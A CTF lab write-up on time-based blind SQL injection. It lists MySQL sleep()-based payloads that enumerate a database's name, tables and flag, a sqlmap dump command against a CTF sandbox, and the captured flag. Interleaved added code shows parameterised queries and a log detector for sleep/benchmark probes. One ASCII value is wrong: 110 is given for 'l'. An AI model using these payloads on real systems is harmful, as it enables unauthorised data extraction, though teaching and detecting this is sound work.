Topic
SQL time-based blind injection
Time-based blind injection attack
Functions such as sleep() or benchmark() are used to make MySQL take longer to execute the query. They are usually combined with if(expr1,expr2,expr3), and whether the condition holds is inferred from the page's response time. if(expr1,expr2,expr3) returns expr2 if expr1 is true, otherwise expr3.
Analysis
1 and if(length(database())=5,sleep(3),1)
1 and if(length(database())=4,sleep(3),1)
1 and if(length(database())=3,sleep(3),1)
The page only responds after 3 seconds, which shows that the database name has length 4.
Guessing the database name
1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1) ascii(s)=115
1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1) ascii(q)=113
1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=110,sleep(3),1) ascii(l)=110
1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1) ascii(i)=105
......
By repeatedly narrowing the ASCII range, the database name is recovered as sqli.
Number of tables in the sqli database
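The enumeration above works only because the id value is concatenated into the SQL statement, so the appended if(...) condition is parsed as SQL. The following added example (not code from the writeup or from CTFHub) shows the two forms side by side: a lookup built by string formatting, whose result depends on the injected condition, and a lookup with a bound parameter, which treats the whole value as data. It uses sqlite3 in memory so it runs offline; because sqlite has no database() or sleep(), a literal length('sqli') stands in for the page's length(database()) test (an assumption for this demonstration only).

```python
import sqlite3


def make_db():
    # Constructed sample data: one table with one row, enough to show the difference.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'hello')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    # String concatenation: whatever follows the number becomes part of the WHERE clause,
    # so a conditional expression appended by the client changes whether the row matches.
    sql = f"SELECT title FROM news WHERE id={user_id}"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn, user_id):
    # Bound parameter: the value is compared with the id column as data and is never parsed
    # as SQL, so the appended condition can no longer influence the query's behaviour.
    row = conn.execute("SELECT title FROM news WHERE id=?", (user_id,)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    # Stand-ins for the page's length(database())=4 / =5 probes (assumption: a literal
    # replaces database() because sqlite has no such function).
    true_probe = "1 and length('sqli')=4"
    false_probe = "1 and length('sqli')=5"
    return {
        # The concatenated query leaks the truth of the condition through its result.
        "vulnerable_true": lookup_vulnerable(conn, true_probe),
        "vulnerable_false": lookup_vulnerable(conn, false_probe),
        # The parameterised query returns nothing for either probe: no information leaks.
        "safe_true": lookup_safe(conn, true_probe),
        "safe_false": lookup_safe(conn, false_probe),
        # Normal use still works.
        "safe_normal": lookup_safe(conn, 1),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

In a real application the same result would be observed as a timing difference rather than a row difference, which is exactly what the writeup measures; the fix is the same. Validating that id is an integer before the query is a useful second check, but parameter binding is what removes the injection.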
1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)
The page responds after 3 seconds, which shows there are two tables.
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
ascii(n)=110
Responds after 3 seconds, so the first letter of the first table is n.
Continuing letter by letter gives the table name news.
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
ascii(f)=102
Responds after 3 seconds, so the first letter of the second table is f.
Continuing letter by letter gives the table name flag.
Testing every character by hand is a lot of work, so switch to sqlmap.
Payload
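From the defender's side, the manual enumeration above leaves a distinctive trace: a burst of requests from one client whose parameters contain sleep() or benchmark(), and whose response times cluster around the sleep value whenever the guessed condition is true. The following added example (not part of the writeup) scans constructed access log lines for that pattern. It assumes an nginx-style combined format extended with a trailing request_time field in seconds; a real log format may differ, and the sample lines are constructed to mirror the probes used on this page.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample log lines (assumption: combined format plus request_time in seconds).
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 0.012
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1%20and%20if(length(database())%3D5,sleep(3),1) HTTP/1.1" 200 512 0.015
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=1%20and%20if(length(database())%3D4,sleep(3),1) HTTP/1.1" 200 512 3.021
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /?id=2 HTTP/1.1" 200 498 0.011
10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /?id=1%20and%20if(ascii(substr(database(),1,1))%3E110,sleep(3),1) HTTP/1.1" 200 512 3.018
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$'
)

# MySQL functions used to stall execution in time-based blind injection (as on this page).
TIME_FUNCS = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)

# Responses slower than this are treated as a triggered delay (assumption: tune per site).
SLOW_SECONDS = 2.5


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["rt"] = float(entry["rt"])
    return entry


def classify(entry):
    """Label a request by whether its parameters carry a timing probe and whether it was slow."""
    params = parse_qs(urlparse(entry["target"]).query, keep_blank_values=True)
    # parse_qs already URL-decodes, so the regex sees the clear-text expression.
    hits = [f"{k}={v}" for k, vs in params.items() for v in vs if TIME_FUNCS.search(v)]
    slow = entry["rt"] >= SLOW_SECONDS
    if hits and slow:
        return "time_blind_confirmed", hits   # probe present and the delay actually fired
    if hits:
        return "time_blind_probe", hits       # probe present, condition evaluated false
    if slow:
        return "slow_response", []            # slow for some other reason; worth a look
    return "ok", []


def scan(log_text):
    """Return one finding per suspicious line, preserving log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        verdict, hits = classify(entry)
        if verdict != "ok":
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "verdict": verdict,
                             "params": hits, "rt": entry["rt"]})
    return findings


def summarize(findings):
    """Count probes and confirmed delays per client address."""
    per_ip = {}
    for f in findings:
        counts = per_ip.setdefault(f["ip"], {"probes": 0, "confirmed": 0})
        if f["verdict"] == "time_blind_probe":
            counts["probes"] += 1
        elif f["verdict"] == "time_blind_confirmed":
            counts["confirmed"] += 1
    return per_ip


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["verdict"], f["rt"], f["params"])
    print(summarize(scan(SAMPLE_LOG)))
```

The signature match alone catches the hand-written probes; the per-client pairing of probes with slow responses is what distinguishes an active extraction from a scanner that merely sends the strings. A tool such as sqlmap produces the same pattern at a much higher request rate, so the per-address counts are the natural threshold to alert on.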
sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag --columns --dump
Flag obtained:
ctfhub{9bc0b66282f7a71f2ca1ebbc}